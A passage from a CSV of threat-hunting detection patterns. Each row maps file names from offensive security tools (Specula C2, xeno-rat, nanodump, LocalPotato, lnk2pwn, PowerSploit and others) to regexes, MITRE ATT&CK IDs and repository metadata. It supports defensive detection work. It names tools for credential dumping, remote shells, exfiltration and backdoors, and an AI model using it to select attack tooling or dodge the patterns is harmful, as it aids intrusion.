"*\list_recyclebin.txt*",".{0,1000}\\list_recyclebin\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16279" "*\list_scheduledtasks.py*",".{0,1000}\\list_scheduledtasks\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16280" 
"*\list_scheduledtasks.txt*",".{0,1000}\\list_scheduledtasks\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16281" "*\list_whoami.py*",".{0,1000}\\list_whoami\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16282" "*\list_whoami.txt*",".{0,1000}\\list_whoami\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16283" "*\ListAllUsers.ps1*",".{0,1000}\\ListAllUsers\.ps1.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - 
TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","16284" "*\ListLogged-inUsers.ps1*",".{0,1000}\\ListLogged\-inUsers\.ps1.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","16285" "*\ListRDPConnections.exe*",".{0,1000}\\ListRDPConnections\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","16286" "*\LiveMicrophone.dll*",".{0,1000}\\LiveMicrophone\.dll.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system 
management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","16288" "*\Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php*",".{0,1000}\\Liz0ziM\sPrivate\sSafe\sMode\sCommand\sExecuriton\sBypass\sExploit\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","16289" "*\lnk_parser_cmd.exe -r *",".{0,1000}\\lnk_parser_cmd\.exe\s\-r\s.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","16303" "*\Lnk2Pwn.java*",".{0,1000}\\Lnk2Pwn\.java.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","0","N/A","N/A","8","2","193","34","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z","16304" 
"*\Lnk2PwnFrame.java*",".{0,1000}\\Lnk2PwnFrame\.java.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","0","N/A","N/A","8","2","193","34","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z","16305" "*\lnk2pwn-master*",".{0,1000}\\lnk2pwn\-master.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","0","N/A","N/A","8","2","193","34","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z","16306" "*\lnkbomb.py*",".{0,1000}\\lnkbomb\.py.{0,1000}","offensive_tool_keyword","lnkbomb","Malicious shortcut generator for collecting NTLM hashes from insecure file shares.","T1023.003 - T1557.002 - T1046","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/dievus/lnkbomb","1","0","N/A","N/A","10","4","327","58","2024-10-22T17:51:10Z","2022-01-03T04:17:11Z","16307" "*\lnkbomb-1.0\*",".{0,1000}\\lnkbomb\-1\.0\\.{0,1000}","offensive_tool_keyword","lnkbomb","Malicious shortcut generator for collecting NTLM hashes from insecure file shares.","T1023.003 - T1557.002 - T1046","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/dievus/lnkbomb","1","0","N/A","N/A","10","4","327","58","2024-10-22T17:51:10Z","2022-01-03T04:17:11Z","16308" "*\Lnk-Sweeper.ps1*",".{0,1000}\\Lnk\-Sweeper\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - 
TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","16309" "*\Lnk-Sweeper.txt*",".{0,1000}\\Lnk\-Sweeper\.txt.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","16310" "*\LNKUp\generate.py*",".{0,1000}\\LNKUp\\generate\.py.{0,1000}","offensive_tool_keyword","LNKUp","Generates malicious LNK file payloads for data exfiltration","T1023.003 - T1048 - T1041 - T1204","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Plazmaz/LNKUp","1","0","N/A","N/A","10","4","384","54","2017-08-21T22:58:13Z","2017-08-09T16:18:07Z","16311" "*\load_ssp.x64.exe*",".{0,1000}\\load_ssp\.x64\.exe.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","16312" "*\loadbalancer.py*",".{0,1000}\\loadbalancer\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","16313" "*\loader.x64.exe*",".{0,1000}\\loader\.x64\.exe.{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","0","N/A","N/A","10","10","103","10","2025-03-27T12:47:34Z","2024-04-11T12:17:22Z","16314" "*\Loader\Loader.csproj*",".{0,1000}\\Loader\\Loader\.csproj.{0,1000}","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion","https://github.com/dr4k0nia/NixImports","1","0","N/A","N/A","N/A","3","207","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z","16315" "*\Loader-EvtExportLog.cpp*",".{0,1000}\\Loader\-EvtExportLog\.cpp.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","N/A","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","16316" "*\Loader-EvtExportLog.exe*",".{0,1000}\\Loader\-EvtExportLog\.exe.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - 
T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","N/A","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","16317" "*\LoaderMemoryModule_x64_Release.exe*",".{0,1000}\\LoaderMemoryModule_x64_Release\.exe.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","16318" "*\LoadLibrary_x64_Release.exe*",".{0,1000}\\LoadLibrary_x64_Release\.exe.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","16319" "*\Local\Temp\logins.log*",".{0,1000}\\Local\\Temp\\logins\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","16321" "*\local_admins.csv*",".{0,1000}\\local_admins\.csv.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","16323" "*\local_execution_linux.exe*",".{0,1000}\\local_execution_linux\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","16324" "*\local_map.exe*",".{0,1000}\\local_map\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","16325" "*\local_thread_hijacking.exe*",".{0,1000}\\local_thread_hijacking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering 
and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","16326" "*\LocalAdminAccess.txt*",".{0,1000}\\LocalAdminAccess\.txt.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","16327" "*\LocalAdminSharp.sln*",".{0,1000}\\LocalAdminSharp\.sln.{0,1000}","offensive_tool_keyword","LocalAdminSharp",".NET executable to use when dealing with privilege escalation on Windows to gain local administrator access","T1055.011 - T1068 - T1548.002 - T1548.003 - T1548.004","TA0004","N/A","N/A","Privilege Escalation","https://github.com/notdodo/LocalAdminSharp","1","0","N/A","N/A","10","2","157","17","2022-11-01T17:45:43Z","2022-01-01T10:35:09Z","16328" "*\localbrute.ps1*",".{0,1000}\\localbrute\.ps1.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - TA0008","N/A","Dispossessor","Credential Access","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","0","N/A","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","16329" "*\localbrute.ps1*",".{0,1000}\\localbrute\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - 
T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","16330" "*\localbrute-extra-mini.ps1*",".{0,1000}\\localbrute\-extra\-mini\.ps1.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - TA0008","N/A","Dispossessor","Credential Access","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","0","N/A","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","16331" "*\LocalPotato\*.cpp*",".{0,1000}\\LocalPotato\\.{0,1000}\.cpp.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","16332" "*\LocalPotato\*.exe*",".{0,1000}\\LocalPotato\\.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. 
This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","16333" "*\LocalPrivEsc\*",".{0,1000}\\LocalPrivEsc\\.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","16334" "*\LocalShellExtParse.py*",".{0,1000}\\LocalShellExtParse\.py.{0,1000}","offensive_tool_keyword","LocalShellExtParse","Script to parse first load time for Shell Extensions loaded by user. Also enumerates all loaded Shell Extensions that are only installed for the Current User.","T1547.009 - T1129","TA0003 - TA0007","N/A","N/A","Discovery","https://github.com/herrcore/LocalShellExtParse","1","0","N/A","N/A","9","1","20","4","2015-06-08T16:55:38Z","2015-06-05T03:23:13Z","16335" "*\LocalShellExtParse-master*",".{0,1000}\\LocalShellExtParse\-master.{0,1000}","offensive_tool_keyword","LocalShellExtParse","Script to parse first load time for Shell Extensions loaded by user. 
Also enumerates all loaded Shell Extensions that are only installed for the Current User.","T1547.009 - T1129","TA0003 - TA0007","N/A","N/A","Discovery","https://github.com/herrcore/LocalShellExtParse","1","0","N/A","N/A","9","1","20","4","2015-06-08T16:55:38Z","2015-06-05T03:23:13Z","16336" "*\localtonet.dll*",".{0,1000}\\localtonet\.dll.{0,1000}","offensive_tool_keyword","localtonet","LocaltoNet is a reverse proxy that enables you to expose your localhost services to the internet","T1090 - T1102 - T1071 - T1105","TA0010 - TA0011 - TA0009 - TA0003 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/engineseller/localtonet","1","0","N/A","N/A","10","1","6","4","2022-01-31T03:19:25Z","2022-01-31T03:17:18Z","16337" "*\localtonet.exe*",".{0,1000}\\localtonet\.exe.{0,1000}","offensive_tool_keyword","localtonet","LocaltoNet is a reverse proxy that enables you to expose your localhost services to the internet","T1090 - T1102 - T1071 - T1105","TA0010 - TA0011 - TA0009 - TA0003 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/engineseller/localtonet","1","0","N/A","N/A","10","1","6","4","2022-01-31T03:19:25Z","2022-01-31T03:17:18Z","16338" "*\localtonet-win*",".{0,1000}\\localtonet\-win.{0,1000}","offensive_tool_keyword","localtonet","LocaltoNet is a reverse proxy that enables you to expose your localhost services to the internet","T1090 - T1102 - T1071 - T1105","TA0010 - TA0011 - TA0009 - TA0003 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/engineseller/localtonet","1","0","N/A","N/A","10","1","6","4","2022-01-31T03:19:25Z","2022-01-31T03:17:18Z","16339" "*\Lock.exe disk*",".{0,1000}\\Lock\.exe\sdisk.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential 
Access","https://github.com/ricardojoserf/TrickDump","1","0","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","16340" "*\lockbit2.txt*",".{0,1000}\\lockbit2\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","16341" "*\lockbit3.txt*",".{0,1000}\\lockbit3\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","16342" "*\LockLess.csproj*",".{0,1000}\\LockLess\.csproj.{0,1000}","offensive_tool_keyword","Lockless","Lockless allows for the copying of locked files.","T1074 - T1020 - T1055","TA0009 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/GhostPack/Lockless","1","0","N/A","N/A","8","3","245","57","2021-04-30T17:51:41Z","2020-03-28T20:57:25Z","16343" "*\LockLess.exe*",".{0,1000}\\LockLess\.exe.{0,1000}","offensive_tool_keyword","Lockless","Lockless allows for the copying of locked files.","T1074 - T1020 - T1055","TA0009 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/GhostPack/Lockless","1","0","N/A","N/A","8","3","245","57","2021-04-30T17:51:41Z","2020-03-28T20:57:25Z","16344" "*\LockLess.exe*",".{0,1000}\\LockLess\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation 
tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","16345" "*\LockLess.exe*",".{0,1000}\\LockLess\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","16346" "*\LockLess.sln*",".{0,1000}\\LockLess\.sln.{0,1000}","offensive_tool_keyword","Lockless","Lockless allows for the copying of locked files.","T1074 - T1020 - T1055","TA0009 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/GhostPack/Lockless","1","0","N/A","N/A","8","3","245","57","2021-04-30T17:51:41Z","2020-03-28T20:57:25Z","16347" "*\loginAAD.ps1*",".{0,1000}\\loginAAD\.ps1.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","16351" "*\logon_backdoor\*",".{0,1000}\\logon_backdoor\\.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - 
T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z","16362" "*\logon_backdoor-master*",".{0,1000}\\logon_backdoor\-master.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z","16363" "*\LogonScreen.exe*",".{0,1000}\\LogonScreen\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 